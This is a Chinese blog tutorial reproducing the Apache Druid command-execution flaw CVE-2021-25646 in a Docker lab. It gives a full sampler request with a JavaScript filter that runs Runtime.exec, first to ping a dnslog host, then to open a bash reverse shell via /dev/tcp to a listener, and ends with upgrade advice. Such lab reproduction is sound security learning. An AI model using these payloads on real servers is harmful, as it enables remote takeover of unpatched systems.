溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

如何進行Apache Druid 命令執(zhí)行漏洞CVE-2021-25646復現(xiàn)

發(fā)布時間:2021-12-29 17:52:18 來源:億速云 閱讀:154 作者:柒染 欄目:安全技術

本篇文章給大家分享的是有關如何進行Apache Druid 命令執(zhí)行漏洞CVE-2021-25646復現(xiàn),小編覺得挺實用的,因此分享給大家學習,希望大家閱讀完這篇文章后可以有所收獲,話不多說,跟著小編一起來看看吧。

0x00簡介

Druid 是一個分布式的、支持實時多維 OLAP 分析的數(shù)據(jù)處理系統(tǒng)。它既支持高速的數(shù)據(jù)實時攝入處理,也支持實時且靈活的多維數(shù)據(jù)分析查詢。因此 Druid 最常用的場景就是大數(shù)據(jù)背景下、靈活快速的多維 OLAP 分析。 另外,Druid 還有一個關鍵的特點:它支持根據(jù)時間戳對數(shù)據(jù)進行預聚合攝入和聚合分析,因此也有用戶經常在有時序數(shù)據(jù)處理分析的場景中用到它。

0x01漏洞概述

在Druid 0.20.0及更低版本中,用戶發(fā)送惡意請求,利用Apache Druid漏洞可以執(zhí)行任意代碼。攻擊者可直接構造惡意請求執(zhí)行任意代碼,控制服務器。

0x02影響版本

Apache Druid < 0.20.1

0x03環(huán)境搭建

1、本次環(huán)境使用docker搭建,需要在虛擬機安裝docker,安裝完成后使用以下命令pull漏洞環(huán)境

docker pull fokkodriesprong/docker-druid

如何進行Apache Druid 命令執(zhí)行漏洞CVE-2021-25646復現(xiàn)

2、下載漏洞環(huán)境后使用以下命令啟動漏洞環(huán)境

docker run --rm -i -p 8888:8888 fokkodriesprong/docker-druid

如何進行Apache Druid 命令執(zhí)行漏洞CVE-2021-25646復現(xiàn)

3、啟動后在瀏覽器訪問http://your-ip:8888/看到以下界面表示成功

如何進行Apache Druid 命令執(zhí)行漏洞CVE-2021-25646復現(xiàn)

0x04漏洞復現(xiàn)

1、在瀏覽器進入Apache Druid首頁如何點擊點擊左上方Load data -> Local disk按鈕

如何進行Apache Druid 命令執(zhí)行漏洞CVE-2021-25646復現(xiàn)

2、右側表單填入Base directory:(quickstart/tutorial/)File filter:

(wikiticker-2015-09-12-sampled.json.gz)填入完成點擊Preview,然后點擊next

如何進行Apache Druid 命令執(zhí)行漏洞CVE-2021-25646復現(xiàn)

3、打開burp并配置代理,然后一直點擊next,直到下一步是Next:Filter時,抓取數(shù)據(jù)包

如何進行Apache Druid 命令執(zhí)行漏洞CVE-2021-25646復現(xiàn)

如何進行Apache Druid 命令執(zhí)行漏洞CVE-2021-25646復現(xiàn)

4、然后替換數(shù)據(jù)包中的data數(shù)據(jù)為以下代碼,然后修改代碼中的dnslog地址為自己的,點擊發(fā)送,查看dnslog是否有數(shù)據(jù)

{"type":"index","spec":{"type":"index","ioConfig":{"type":"index","firehose":{"type":"local","baseDir":"quickstart/tutorial/","filter":"wikiticker-2015-09-12-sampled.json.gz"}},"dataSchema":{"dataSource":"sample","parser":{"type":"string","parseSpec":{"format":"json","timestampSpec":{"column":"time","format":"iso"},"dimensionsSpec":{}}},"transformSpec":{"transforms":[],"filter":{"type":"javascript",

"function":"function(value){return java.lang.Runtime.getRuntime().exec('ping kujqmk.dnslog.cn -c 1')}",

"dimension":"added",

"":{

"enabled":"true"

}

}}}},"samplerConfig":{"numRows":500,"timeoutMs":15000,"cacheKey":"4ddb48fdbad7406084e37a1b80100214"}}

如何進行Apache Druid 命令執(zhí)行漏洞CVE-2021-25646復現(xiàn)

如何進行Apache Druid 命令執(zhí)行漏洞CVE-2021-25646復現(xiàn)

5、修改dnslog地址為反彈shell的payload,在kali中設置監(jiān)聽,可以看到成功反彈shell

exec('/bin/bash -c $@|bash 0 echo bash -i >& /dev/tcp/172.16.1.132/8896 0>&1')

如何進行Apache Druid 命令執(zhí)行漏洞CVE-2021-25646復現(xiàn)

如何進行Apache Druid 命令執(zhí)行漏洞CVE-2021-25646復現(xiàn)

0x05修復建議

1、升級到最新版Apache Druid,下載地址為

https://druid.apache.org/downloads.html

以上就是如何進行Apache Druid 命令執(zhí)行漏洞CVE-2021-25646復現(xiàn),小編相信有部分知識點可能是我們日常工作會見到或用到的。希望你能通過這篇文章學到更多知識。更多詳情敬請關注億速云行業(yè)資訊頻道。

向AI問一下細節(jié)

免責聲明:本站發(fā)布的內容(圖片、視頻和文字)以原創(chuàng)、轉載和分享為主,文章觀點不代表本網(wǎng)站立場,如果涉及侵權請聯(lián)系站長郵箱:is@yisu.com進行舉報,并提供相關證據(jù),一經查實,將立刻刪除涉嫌侵權內容。

AI